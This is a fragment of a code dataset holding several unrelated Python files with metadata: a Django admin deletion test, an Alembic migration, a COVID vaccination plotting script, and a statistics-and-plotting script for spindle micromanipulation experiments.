"line_number": 584, "usage_type": "attribute"}, {"api_name": "tensorflow.exp", "line_number": 584, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 585, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 588, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 588, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 589, "usage_type": "call"}, {"api_name": 
"tensorflow.nn", "line_number": 589, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 590, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 591, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 591, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 592, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 592, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.tanh", "line_number": 593, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 593, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 597, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 597, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 598, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 598, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 600, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 601, "usage_type": "call"}, {"api_name": "tensorflow.train.MomentumOptimizer", "line_number": 604, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 604, "usage_type": "attribute"}, {"api_name": "tensorflow.trainable_variables", "line_number": 605, "usage_type": "call"}, {"api_name": "tensorflow.clip_by_global_norm", "line_number": 607, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 636, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 637, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 653, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 674, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 675, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 676, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 677, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 723, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 723, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 725, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 737, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 740, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 756, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 806, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 812, "usage_type": "call"}]} +{"seq_id": "323645953", "text": "from django.conf import settings\nfrom django.conf.urls import patterns, include\nfrom django.contrib.admin import AdminSite\nfrom django.core.exceptions import PermissionDenied\nfrom django.test import TestCase\nfrom publish.actions import delete_selected\nfrom publish.admin import PublishableAdmin\nfrom publish.tests.example_app.models import FlatPage\n\n\nclass TestDeleteSelected(TestCase):\n def setUp(self):\n super(TestDeleteSelected, self).setUp()\n self.fp1 = FlatPage.objects.create(url='/fp1', title='FP1')\n self.fp2 = FlatPage.objects.create(url='/fp2', title='FP2')\n self.fp3 = FlatPage.objects.create(url='/fp3', title='FP3')\n\n self.fp1.publish()\n self.fp2.publish()\n self.fp3.publish()\n\n self.admin_site = AdminSite('Test Admin')\n self.page_admin = PublishableAdmin(FlatPage, self.admin_site)\n\n # override urls, so reverse works\n 
settings.ROOT_URLCONF = patterns(\n '',\n ('^admin/',\n include(self.admin_site.urls)),\n )\n\n def test_delete_selected_check_cannot_delete_public(self):\n # delete won't work (via admin) for public instances\n request = None\n self.assertRaises(PermissionDenied, delete_selected, self.page_admin,\n request, FlatPage.objects.published())\n\n def test_delete_selected(self):\n class dummy_request(object):\n POST = {}\n META = {}\n\n class user(object):\n @classmethod\n def has_perm(cls, *arg):\n return True\n\n @classmethod\n def get_and_delete_messages(cls):\n return []\n\n response = delete_selected(self.page_admin, dummy_request,\n FlatPage.objects.draft())\n self.failUnless(response is not None)\n", "sub_path": "publish/tests/test_delete_selected.py", "file_name": "test_delete_selected.py", "file_ext": "py", "file_size_in_byte": 1872, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.create", "line_number": 14, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 14, "usage_type": "name"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.create", "line_number": 15, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 15, "usage_type": "name"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.create", "line_number": 16, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 16, "usage_type": "name"}, {"api_name": "django.contrib.admin.AdminSite", "line_number": 22, "usage_type": "call"}, {"api_name": "publish.admin.PublishableAdmin", "line_number": 23, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.conf.settings.ROOT_URLCONF", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 26, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 29, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 35, "usage_type": "argument"}, {"api_name": "publish.actions.delete_selected", "line_number": 35, "usage_type": "argument"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.published", "line_number": 36, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", "line_number": 36, "usage_type": "name"}, {"api_name": "publish.actions.delete_selected", "line_number": 52, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects.draft", "line_number": 53, "usage_type": "call"}, {"api_name": "publish.tests.example_app.models.FlatPage.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "publish.tests.example_app.models.FlatPage", 
"line_number": 53, "usage_type": "name"}]} +{"seq_id": "641785692", "text": "\"\"\"empty message\n\nRevision ID: c4fb1193c906\nRevises: 0492ec975f7c\nCreate Date: 2018-01-04 11:08:03.480491\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c4fb1193c906'\ndown_revision = '0492ec975f7c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('categories_categ_name_key', 'categories', type_='unique')\n op.drop_constraint('recipes_recipe_name_key', 'recipes', type_='unique')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint('recipes_recipe_name_key', 'recipes', ['recipe_name'])\n op.create_unique_constraint('categories_categ_name_key', 'categories', ['categ_name'])\n # ### end Alembic commands ###\n", "sub_path": "migrations/versions/c4fb1193c906_.py", "file_name": "c4fb1193c906_.py", "file_ext": "py", "file_size_in_byte": 872, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "alembic.op.drop_constraint", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "364970921", "text": "import sys\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport pandasql as ps\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef main():\r\n script = sys.argv[0]\r\n locations = sys.argv[1:]\r\n df_loaction = pd.DataFrame(locations)\r\n df_loaction.rename(columns={0:'loaction'},inplace=True)\r\n df=pd.read_csv('covid-locations.csv')\r\n list1=[]\r\n list2=[]\r\n df_list = df['location'].tolist()\r\n if sys.argv == ['week3.py']:\r\n print('Error: No Locations were specified. 
Cannot proceed.')\r\n print('Please specify locations like so:')\r\n print(\"python3 week3.py 'Australia' 'Brazil' 'New Zealand'\")\r\n else :\r\n for location in locations:\r\n if location in df_list:\r\n list1.append(location)\r\n else :\r\n list2.append(location)\r\n \r\n if len(list2) == 0:\r\n print('Generating visualisation for' + str(list1))\r\n df_covid_data = pd.read_csv('owid-covid-data.csv')\r\n df_select= ps.sqldf(\r\n\t \"SELECT c.location, c.people_fully_vaccinated_per_hundred, c.date \"\r\n\t + \" FROM df_covid_data as c inner join df_loaction as l\"\r\n + \" on c.location = l.loaction \"\r\n )\r\n\r\n df_select = df_select.dropna(subset = ['people_fully_vaccinated_per_hundred'])\r\n df_select['date'] = pd.to_datetime(df_select['date'])\r\n fig = plt.figure(figsize=(12, 8))\r\n ax = fig.add_subplot(1,1,1)\r\n sb_lineplot = sns.lineplot(x='date', y='people_fully_vaccinated_per_hundred', hue='location', markers=True, data=df_select)\r\n ax.set_title(\"COVID-19 people FULLY vaccinated per hundred: Wallia and Japan/Liechtenstein/Greece/Monaco/Hungary\")\r\n plt.xticks(rotation=20)\r\n plt.savefig('001.png')\r\n #df_select.to_csv(\"chartdata.csv\")\r\n #print('----Done')\r\n \r\n else:\r\n print('Error: Locations' + str(list2) + ' are not found in dataset. Cannot proceed.')\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "week3.py", "file_name": "week3.py", "file_ext": "py", "file_size_in_byte": 2085, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandasql.sqldf", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "553625680", "text": "\n# This script reads in a pickled dictionary containing the data from each experiment\n# Specify the path for where this dictionary is and an output path for where plots should save\n\n# This runs stats on measurements across different cells\n\n\n# first import whatever you need\nimport sys\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport scipy\nimport pandas as pd\nimport math\n#import seaborn as sns\nfrom scipy.stats import ttest_rel,wilcoxon,spearmanr\n\n#plt.style.use('seaborn-whitegrid')\n\nimport pickle\n\n# clear any plots\n\nplt.clf()\n\n# set up your paths\n\ndatapath = \"/Users/alexandralong/Documents/UCSF/Dumont Lab/Analysis/Micromanipulation/MtrackJ_testing/plots/alldata.p\"\noutputpath = \"/Users/alexandralong/Documents/UCSF/Dumont 
Lab/Analysis/Micromanipulation/MtrackJ_testing/plots\"\n\n# load pickled data \n# this was created from makeMasterStructure.py and stored dict of all experiment dicts\nalldata = pickle.load( open(datapath, \"rb\" ) )\n\n# initialize the key variables and figures you want to make\nfig1, ax1= plt.subplots(2,2)\nfig2, ax2 = plt.subplots(2,2)\nfig3,ax3 = plt.subplots(2,2)\nfig5,ax5 = plt.subplots(1)\nfig6,ax6 = plt.subplots(1)\n#fig2.set_size_inches(2, 6)\n\nK1K2start = []\nK1K2end = []\nK3K4start = []\nK3K4end = []\npole1= []\npole2 = []\nKT1Pole1start = []\nKT2Pole2start = []\nKT3Pole1start = []\nKT4Pole2start = []\nKT1Pole1end = []\nKT2Pole2end = []\nKT3Pole1end = []\nKT4Pole2end = []\nspindlelengthstart = []\nspindlelengthend = []\nspindlewidthstart = []\nspindlewidthend = []\narc12start = []\narc12end = []\narc34start = []\narc34end = []\nKfib1vel = []\nKfib2vel = []\nKfib3vel = []\nKfib4vel = []\nneedlediam = []\nneedletotaltime = []\nneedletotaldist = []\nnamelist = []\nK1K2deltanorm = []\nneedletoKT1dist = []\n\n# loop through each cell and build a list \nfor exp in alldata:\n\n\texpname = alldata[exp]['Name']\n\tnamelist.append(expname)\n\n\tK1K2start.append(alldata[exp]['KT12_duringmanip'][3])\n\tK1K2end.append(alldata[exp]['KT12_duringmanip'][0])\n\tK3K4start.append(alldata[exp]['KT34_duringmanip'][3])\n\tK3K4end.append(alldata[exp]['KT34_duringmanip'][0])\n\tKT1Pole1start.append(alldata[exp]['KT1toPole1_duringmanip'][0])\n\tKT2Pole2start.append(alldata[exp]['KT2toPole2_duringmanip'][0])\n\tKT3Pole1start.append(alldata[exp]['KT3toPole1_duringmanip'][0])\n\tKT4Pole2start.append(alldata[exp]['KT4toPole2_duringmanip'][0])\n\n\tK1K2deltanorm.append((alldata[exp]['KT12_duringmanip'][0]-alldata[exp]['KT12_duringmanip'][3])/alldata[exp]['KT12_duringmanip'][3])\n\n\tneedletoKT1dist.append(alldata[exp]['NeedleToKT1'][0])\n\n\t#KT1Pole1end.append(alldata[exp]['KT1toPole1_duringmanip'][-1])\n\tKT2Pole2end.append(alldata[exp]['KT2toPole2_duringmanip'][-1])\n\tKT3Pole1end.append(alldata[exp]['KT3toPole1_duringmanip'][-1])\n\tKT4Pole2end.append(alldata[exp]['KT4toPole2_duringmanip'][-1])\n\tspindlelengthstart.append(alldata[exp]['SpindleLength'][0])\n\tspindlelengthend.append(alldata[exp]['SpindleLength'][1])\n\tspindlewidthstart.append(alldata[exp]['SpindleWidth'][0])\n\tspindlewidthend.append(alldata[exp]['SpindleWidth'][1])\n\n\tpole1.append(alldata[exp]['Pole1_duringmanip'])\n\tpole2.append(alldata[exp]['Pole2_duringmanip'])\n\n\tneedlediam.append(alldata[exp]['NeedleDiam'])\n\tendpoint = alldata[exp]['NeedleIndexEnd']\n\tneedletotaltime.append(alldata[exp]['NeedleTime'][endpoint] - alldata[exp]['NeedleTime'][0])\n\tneedletotaldist.append(alldata[exp]['NeedlePos'][endpoint]-alldata[exp]['NeedlePos'][0])\n\n\tKfib1vel.append(alldata[exp]['KT1toPole1Fit'][0]*60)\n\tKfib2vel.append(alldata[exp]['KT2toPole2Fit'][0]*60)\n\tKfib3vel.append(alldata[exp]['KT3toPole1Fit'][0]*60)\n\tKfib4vel.append(alldata[exp]['KT4toPole2Fit'][0]*60)\n\n\t# this is summing the distance along a k-fiber pair from pole to pole (diff way to quantify geometry 
changes)\n\tarc12start.append(alldata[exp]['KT1toPole1_duringmanip'][0]+alldata[exp]['KT12_duringmanip'][3]+alldata[exp]['KT2toPole2_duringmanip'][0])\n\t#arc12end.append(alldata[exp]['KT1toPole1_duringmanip'][-1]+alldata[exp]['KT12_duringmanip'][0]+alldata[exp]['KT3toPole1_duringmanip'][-1])\n\tarc34start.append(alldata[exp]['KT3toPole1_duringmanip'][0]+alldata[exp]['KT34_duringmanip'][3]+alldata[exp]['KT4toPole2_duringmanip'][0])\n\tarc34end.append(alldata[exp]['KT3toPole1_duringmanip'][-1]+alldata[exp]['KT34_duringmanip'][0]+alldata[exp]['KT4toPole2_duringmanip'][-1])\n\n\t# or try calculating the arc using the needle position (to better estimate k-fiber 1)\n\t#arc12start.append(alldata[exp]['NeedleToKT1'][0]+alldata[exp]['NeedleToPole1'][0]+alldata[exp]['KT12_duringmanip'][3]+alldata[exp]['KT2toPole2_duringmanip'][0])\n\tarc12end.append(alldata[exp]['NeedleToKT1'][1]+alldata[exp]['NeedleToPole1'][1]+alldata[exp]['KT12_duringmanip'][0]+alldata[exp]['KT3toPole1_duringmanip'][-1])\n\t#KT1Pole1start.append(alldata[exp]['NeedleToKT1'][0]+alldata[exp]['NeedleToPole1'][0])\n\tKT1Pole1end.append(alldata[exp]['NeedleToKT1'][1]+alldata[exp]['NeedleToPole1'][1])\n\n\t#print(alldata[exp]['NeedleToKT1'][0]) \n\t#print(alldata[exp]['NeedleToPole1'][0])\n\t#print(alldata[exp]['KT1toPole1_duringmanip'][0])\n\t#print(alldata[exp]['NeedleToKT1'][1] + alldata[exp]['NeedleToPole1'][1])\n\t#print(alldata[exp]['KT1toPole1_duringmanip'][-1])\n## Now outside of the loop, save all the figures\n## make sure that the formatting includes the legend so it's not cropped out \n\n\n\n# compute a paired statistical test (since the measurements pre post should be paired by cell)\n\ndeltaK1K2results = scipy.stats.wilcoxon(K1K2start,K1K2end)\ndeltaK3K4results = scipy.stats.wilcoxon(K3K4start,K3K4end)\n\ndeltaKfib1results = scipy.stats.wilcoxon(KT1Pole1start,KT1Pole1end)\ndeltaKfib2results = scipy.stats.wilcoxon(KT2Pole2start,KT2Pole2end)\ndeltaKfib3results = scipy.stats.wilcoxon(KT3Pole1start,KT3Pole1end)\ndeltaKfib4results = scipy.stats.wilcoxon(KT4Pole2start,KT4Pole2end)\n\ndeltaSpindleLength = scipy.stats.wilcoxon(spindlelengthstart,spindlelengthend)\ndeltaSpindleWidth = scipy.stats.wilcoxon(spindlewidthstart,spindlewidthend)\n\ndeltaArc12 = scipy.stats.wilcoxon(arc12start,arc12end)\ndeltaArc34 = scipy.stats.wilcoxon(arc34start,arc34end)\n\nperim_start = np.add(arc12start,arc34start)\nperim_end = np.add(arc12end,arc34end)\nperim = scipy.stats.wilcoxon(perim_start,perim_end)\n\ndeltaKfib1 = np.subtract(KT1Pole1end,KT1Pole1start)\ndeltaK1K2 = np.subtract(K1K2end,K1K2start)/K1K2start\ndeltaK3K4 = np.subtract(K3K4end,K3K4start)/K3K4start\ndeltaKfib2 = np.subtract(KT2Pole2end,KT2Pole2start)\ndeltaKfib3 = np.subtract(KT3Pole1end,KT3Pole1start)\ndeltaKfib4 = np.subtract(KT4Pole2end,KT4Pole2start)\ndeltaperim = np.subtract(perim_end,perim_start)\n\n\nprint('deltaK1K2results=',deltaK1K2results)\nprint('deltaK3K4results=',deltaK3K4results)\nprint('deltaKfib1results=',deltaKfib1results)\nprint('deltaKfib2results=',deltaKfib2results)\nprint('deltaKfib3results=',deltaKfib3results)\nprint('deltaKfib4results=',deltaKfib4results)\nprint('delta spindle length=',deltaSpindleLength)\nprint('delta spindle width=',deltaSpindleWidth)\nprint('delta arc12=',deltaArc12)\nprint('delta arc34=',deltaArc34)\nprint('perimeter = ',perim)\n\n\nprint('avg spindle length at start %.2f +/- %.2f' %(np.mean(spindlelengthstart),np.std(spindlelengthstart)/np.sqrt(len(spindlelengthstart))))\nprint('avg spindle length at end %.2f +/- %.2f' 
%(np.mean(spindlelengthend),np.std(spindlelengthend)/np.sqrt(len(spindlelengthend))))\n\nprint('avg spindle width at start %.2f +/- %.2f' %(np.mean(spindlewidthstart),np.std(spindlewidthstart)/np.sqrt(len(spindlewidthstart))))\nprint('avg spindle width at end %.2f +/- %.2f' %(np.mean(spindlewidthend),np.std(spindlewidthend)/np.sqrt(len(spindlewidthend))))\n\nprint(scipy.stats.spearmanr(deltaK1K2,deltaKfib1))\nprint(scipy.stats.spearmanr(deltaK1K2,deltaKfib2))\nprint(scipy.stats.spearmanr(deltaK1K2,deltaKfib3))\nprint(scipy.stats.spearmanr(deltaK1K2,deltaKfib4))\n\nprint('******')\n#print(np.corrcoef(deltaKfib1,deltaK3K4))\n#print(np.corrcoef(deltaKfib2,deltaK3K4))\n#print(np.corrcoef(deltaKfib3,deltaK3K4))\n#print(np.corrcoef(deltaKfib4,deltaK3K4))\nprint(scipy.stats.spearmanr(pole1,deltaKfib1))\nprint(scipy.stats.spearmanr(pole1,deltaKfib2))\nprint(scipy.stats.spearmanr(pole1,deltaKfib3))\nprint(scipy.stats.spearmanr(pole1,deltaKfib4))\nprint('******')\n\n#print(np.corrcoef(deltaKfib1,pole2))\n#print(np.corrcoef(deltaKfib2,pole2))\n#print(np.corrcoef(deltaKfib3,pole2))\n#print(np.corrcoef(deltaKfib4,pole2))\n\nprint(scipy.stats.spearmanr(pole1,deltaK1K2))\nprint(scipy.stats.spearmanr(pole2,deltaK1K2))\n\nprint(scipy.stats.spearmanr(pole1,needletoKT1dist))\n\n\n# top left - interkinetochore distances\n#sns.boxplot(data = [K1K2start,K1K2end,K3K4start,K3K4end], ax=ax1)\n#sns.swarmplot(data = [K1K2start,K1K2end,K3K4start,K3K4end],ax=ax1)\nax1[0,0].boxplot([K1K2start,K1K2end,K3K4start,K3K4end],0,labels = ['K1K2 pre','K1K2 post','K3K4 pre','K3K4 post'],showmeans=True)\n\nax1[0,0].set_ylabel('Interkinetochore distance (\u03bcm)')\nax1[0,0].set_xticklabels(ax1[0,0].get_xticklabels(),rotation=90)\n\n# top right - approximation of k-fiber length\nax1[0,1].boxplot([KT1Pole1start,KT1Pole1end,KT2Pole2start,KT2Pole2end,KT3Pole1start,KT3Pole1end,KT4Pole2start,KT4Pole2end],0,labels = ['Kfib1 pre','Kfib1 post','Kfib2 pre', 'Kfib2 post','Kfib3 pre','Kfib3 post','Kfib4 pre','Kfib4 post'],showmeans=True)\nax1[0,1].set_xticklabels(ax1[0,1].get_xticklabels(),rotation=90)\nax1[0,1].set_ylabel('Crude k-fiber length (\u03bcm)')\n\n# bottom left spindle length and width\nax1[1,0].boxplot([spindlelengthstart,spindlelengthend,spindlewidthstart,spindlewidthend],0,labels = ['Length pre','Length post','Width pre','Width post'],showmeans=True)\nax1[1,0].set_xticklabels(ax1[1,0].get_xticklabels(),rotation=90)\nax1[1,0].set_ylabel('Spindle Dimensions (\u03bcm)')\n\n# bottom right (perimeter)\nax1[1,1].boxplot([arc12start,arc12end,arc34start,arc34end,np.add(arc12start,arc34start),np.add(arc12end,arc34end)],0,labels = ['Arc12 pre','Arc12 post','Arc34 pre','Arc34 post','Perim start','Perim end'],showmeans=True)\nax1[1,1].set_xticklabels(ax1[1,1].get_xticklabels(),rotation=90)\nax1[1,1].set_ylabel('Arc length (\u03bcm)')\n\nax5.scatter(pole1,K1K2deltanorm,color = 'k')\nax5.set_xlabel('Pole1 total dist (\u03bcm)',fontsize = 25)\nax5.set_ylabel('Normalized Delta K1-K2 ',fontsize = 25)\nax5.set_xlim(0,8.5)\nlinfit2 = np.polyfit(pole1, K1K2deltanorm, 1)\nval2 = np.polyval(linfit2,pole1)\nax5.plot(pole1,val2)\nfig5.savefig('%s/KKdeltanormvspolescatter.eps'%outputpath,dpi=300)\n\n\nax6.scatter(pole1,needletoKT1dist,color = 'k')\nax6.set_xlabel('Pole1 total dist (\u03bcm)',fontsize = 25)\nax6.set_ylabel('needle center to KT1 (\u03bcm)',fontsize = 25)\nax6.set_xlim(0,8.5)\nlinfit1 = np.polyfit(pole1, needletoKT1dist, 1)\nval = 
np.polyval(linfit1,pole1)\nax6.plot(pole1,val)\nfig6.savefig('%s/needledistvspolescatter.eps'%outputpath,dpi=300)\n\n\n#popt, pcov = curve_fit(gauss_function,xdata,ydata,[10,1,1])\n\n# bottom right (perimeter)\n#numSamples = len(arc12start)\n#x = np.ones(numSamples)\n\n#ax3[0].scatter(x,arc12start)\n#ax3[0].scatter(x*2,arc12end)\n#ax3[0].scatter(x*3,arc34start)\n#ax3[0].scatter(x*4,arc34end)\n#ax3[0].scatter(x*5,np.add(arc12start,arc34start))\n#ax3[0].scatter(x*6,np.add(arc12end,arc34end))\n\n# what predicts whether a cell will change perimeter or not?\n#ax3[0,0].scatter(deltaK1K2,deltaperim)\n#ax3[0,0].set_xlabel('Delta K1K2 (\u03bcm)')\n#ax3[0,0].set_ylabel('Delta perimeter (\u03bcm)')\n\n#ax3[0,1].scatter(needlediam,deltaperim)\n#ax3[0,1].set_xlabel('Needle Diam (s)')\n#ax3[0,1].set_ylabel('Delta perimeter (\u03bcm)')\n\n#ax3[1,0].scatter(needletotaltime,deltaperim, label = namelist)\n#ax3[1,0].set_xlabel('Needle Total Time (s)')\n#ax3[1,0].set_ylabel('Delta perimeter (\u03bcm)')\n\n#ax3[1,1].scatter(needletotaldist,deltaperim)\n#ax3[1,1].set_xlabel('Needle Total Dist (\u03bcm)')\n#ax3[1,1].set_ylabel('Delta perimeter (\u03bcm)')\n\n\nax2[0,0].hist(needlediam)\nax2[0,0].set_ylabel('Count')\nax2[0,0].set_xlabel('Needle diameter (\u03bcm)')\n\nax2[0,1].hist(needletotaltime)\nax2[0,1].set_ylabel('Count')\nax2[0,1].set_xlabel('Needle Total Time (s)')\n\nax2[1,0].hist(needletotaldist)\nax2[1,0].set_ylabel('Count')\nax2[1,0].set_xlabel('Needle Total Dist (\u03bcm)')\n#ax2[2].set_xlim(0,12)\n\nax2[1,1].hist(np.divide(needletotaldist,needletotaltime)*60)\nax2[1,1].set_ylabel('Count')\nax2[1,1].set_xlabel('Needle Velocity (\u03bcm/min)')\n\n\n# save the figure\nfig1.tight_layout()\nfig1.savefig('%s/manipboxplots.eps'%outputpath,dpi=300)\n\nfig2.tight_layout()\nfig2.savefig('%s/assay_setup_histograms.eps'%outputpath,dpi=300)\n\n#fig3.tight_layout()\n#fig3.savefig('%s/perim_bycell.tif'%outputpath,dpi=300)\n\n\n\n", "sub_path": "analysis/makePlotsWithStats.py", "file_name": "makePlotsWithStats.py", "file_ext": "py", "file_size_in_byte": 12407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.clf", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 141, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 141, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 142, "usage_type": "attribute"}, {"api_name": 
"scipy.stats.wilcoxon", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 144, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 145, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 145, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 146, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 147, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 147, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 149, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 149, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 150, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 150, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 152, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 152, "usage_type": "attribute"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 153, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.add", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 156, "usage_type": "call"}, {"api_name": "scipy.stats.wilcoxon", "line_number": 157, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 157, "usage_type": "attribute"}, {"api_name": "numpy.subtract", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 164, 